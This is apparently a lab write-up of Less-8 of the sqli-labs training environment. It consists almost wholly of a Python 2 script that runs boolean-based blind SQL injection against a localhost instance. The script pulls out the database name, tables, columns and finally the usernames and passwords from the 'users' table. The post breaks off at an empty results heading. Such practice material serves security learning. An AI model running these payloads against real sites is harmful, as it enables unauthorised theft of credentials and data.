sql-labs Less8 盲注

#!/usr/bin/env python3
# -*- coding: utf-8 -*-

import requests

#数据库长度
import time

url = "http://localhost/sqli-labs-master/Less-8"
# 0' or length(database())=8 --+
len = -1
for i in range(1,100):
    param = "0' or length(database())=" + str(i) + "#"
    res = requests.get(url,{'id':param})
    # if 'You are in' in res.text:
    #     print '数据库长度为 %d' % i
    #     break
    if  res.content.decode('utf-8').find('You are in') != -1:  #返回结果为-1，但在布尔中应该判断成了true，只要不等于0
        print '数据库长度为 %d' % i
        len = i
        break

#数据库名
arr = []    #ascii表里所有字符
arr.append('')
for i in range(33, 127):
    arr.append(chr(i))

database = ''
for j in range(1,len+1):
    for i in arr:
        param = "0' or (mid((database()) from(" + str(j) + ") for(1)))='" + i + "'#"
        res = requests.get(url, {'id': param})
        # print res.url,i
        # print res.url
        if 'You are in' in res.text:
            database = database + str(i).lower()
            # print database
            break

print '数据库名为：%s' % database

#表个数
tableCnt = -1
for i in range(1,100):
    param = "0' or (select count(table_name) as c from information_schema.tables where table_schema = database()) =" + str(i) + "#"
    res = requests.get(url, {'id': param})
    if 'You are in' in res.text:
        tableCnt = i
        break
print '表个数为：%d' % tableCnt

#表名称
tables = []
for i in range(0,tableCnt):
    table_name = ''
    isOk = False
    for j in range(1,100):
        for q in arr:
            if not isOk:
                param = "0' or (mid((select table_name as c from information_schema.tables " \
                        "where table_schema = database() limit %d,1) from(%d) for(1)))='%s' #" % (i, j, q)
                res = requests.get(url, {'id': param})
                # print i, j, q
                if 'You are in' in res.text:
                    if q == '':
                        isOk = True
                        break
                    else :
                        table_name = table_name + str(q).lower()
                    # print table_name
                    break
    tables.append(table_name)
print '表名称：%s' % tables

#字段个数  user为例
columnCnt = -1
for i in range(1,100):
    param = "0' or (select count(column_name) as c from information_schema.columns where table_schema = database() and table_name = 'users') =" + str(i) + "#"
    res = requests.get(url, {'id': param})
    if 'You are in' in res.text:
        columnCnt = i
        break
print '字段个数为：%d' % columnCnt


#字段名称
columns = []
for i in range(0,columnCnt):
    column_name = ''
    isOk = False
    for j in range(1,100):
        for q in arr:
            if not isOk:
                param = "0' or (mid((select column_name as c from information_schema.columns " \
                        "where table_schema = database() and table_name = 'users' limit %d,1) from(%d) for(1)))='%s' #" % (i, j, q)
                res = requests.get(url, {'id': param})
                # print i, j, q
                if 'You are in' in res.text:
                    if q == '':
                        isOk = True
                        break
                    else :
                        column_name = column_name + str(q).lower()
                    # print column_name
                    break
    columns.append(column_name)
print '字段名称：%s' % columns

time.sleep(5)
#数据
data = ''
isOk = False
for i in range(1,1000):
    for j in arr:
        if not isOk:
            param = "0' or (mid((select GROUP_CONCAT(id,username,password) from users) from(%d) for(1)))='%s' #" % (i, j)
            res = requests.get(url, {'id' : param})
            if 'You are in' in res.text:
                if j == '':
                    isOk = True
                    break
                else:
                    data = data + str(j).lower()
                # print data
                break
data = data.split(',')
print '数据为：%s' % data

 

结果：